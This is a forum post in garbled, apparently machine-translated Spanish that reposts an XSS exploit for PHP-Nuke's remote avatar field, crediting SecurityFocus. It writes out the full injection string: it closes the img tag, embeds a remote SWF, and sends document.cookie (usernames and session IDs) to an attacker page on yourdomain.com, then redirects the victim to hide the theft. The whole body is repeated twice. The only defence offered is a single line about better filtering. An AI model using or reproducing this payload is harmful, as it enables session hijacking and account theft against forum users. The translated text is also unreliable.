Autor
Código:
< b>effects:</b >
todas las versiones del nuke del php
< b>solution:</b >
una filtración mejor de la selección avatar de forma externa.
en la selección avatar del perfil, uno tiene la opción de ligarse a una imagen del offsite que éste es el lugar perfecto para una hazaña.
poniendo esta línea del código en la caja cerrará la etiqueta actual del img y la ocultará.
< b>Code:</b >
"width=0 height=0 >
después de que este código nosotros ahora llame (no realmente) un de flash especialmente hecha a mano archivado en mi Website.
< b>Code:</b >
<embed src=http://yourdomain.com/redirect.swf width=0 height=0>
esto opinión el swf y el interior el swf es solamente un marco "un marco de acción" y la acción volverá a dirigir su browser a un sitio en mi página +document.cookie y en la galleta sea usernames e identificaciones de la sesión esencialmente bastante a la conexión pues quienquiera él era que es el código
< b>Code:</b >
geturl("javascript:location.replace('http://yourdomain.com/c
ookie.html?'+document.cookie)")
en cookie.html uno pudo también poner un redirigir para enviarlo de nuevo al Home Page o algo, mientras él no ve su código;)
ahora nuestro fullcode es este
< b>Code:</b >
"width=0 height=0><embed src=http://yourdomain.com/redirect.swf width=0 height=0 >
ahora en el extremo tenemos que comenzar otra etiqueta o cierre del img , que es donde pongo mi avatar
< b>Code:</b >
< img src=http://yourdomain.com/avatar.bmp
este código agregará mi avatar y el conclusión de la etiqueta del img del defecto lo cerrará.
nuestro código completo del exploit es
< b>Code:</b >
"width=0 height=0><embed src=http://yourdomain.com/redirect.swf width=0 height=0><img src=http://yourdomain.com/avatar.bmp
qué hará
1.)cerrara la img principal.
2.)abrira su swf.
3.)redireccionara a ellos a su sitio
4.)robara la cookie
5.) nuevo redirect
¡6.)abrira un avatar!
todas las versiones del nuke del php
< b>solution:</b >
una filtración mejor de la selección avatar de forma externa.
en la selección avatar del perfil, uno tiene la opción de ligarse a una imagen del offsite que éste es el lugar perfecto para una hazaña.
poniendo esta línea del código en la caja cerrará la etiqueta actual del img y la ocultará.
< b>Code:</b >
"width=0 height=0 >
después de que este código nosotros ahora llame (no realmente) un de flash especialmente hecha a mano archivado en mi Website.
< b>Code:</b >
<embed src=http://yourdomain.com/redirect.swf width=0 height=0>
esto opinión el swf y el interior el swf es solamente un marco "un marco de acción" y la acción volverá a dirigir su browser a un sitio en mi página +document.cookie y en la galleta sea usernames e identificaciones de la sesión esencialmente bastante a la conexión pues quienquiera él era que es el código
< b>Code:</b >
geturl("javascript:location.replace('http://yourdomain.com/c
ookie.html?'+document.cookie)")
en cookie.html uno pudo también poner un redirigir para enviarlo de nuevo al Home Page o algo, mientras él no ve su código;)
ahora nuestro fullcode es este
< b>Code:</b >
"width=0 height=0><embed src=http://yourdomain.com/redirect.swf width=0 height=0 >
ahora en el extremo tenemos que comenzar otra etiqueta o cierre del img , que es donde pongo mi avatar
< b>Code:</b >
< img src=http://yourdomain.com/avatar.bmp
este código agregará mi avatar y el conclusión de la etiqueta del img del defecto lo cerrará.
nuestro código completo del exploit es
< b>Code:</b >
"width=0 height=0><embed src=http://yourdomain.com/redirect.swf width=0 height=0><img src=http://yourdomain.com/avatar.bmp
qué hará
1.)cerrara la img principal.
2.)abrira su swf.
3.)redireccionara a ellos a su sitio
4.)robara la cookie
5.) nuevo redirect
¡6.)abrira un avatar!
Fuente:securityfocus
Salu2
PD: mi ingles es algo malo, sorry por la traduccion...
En línea
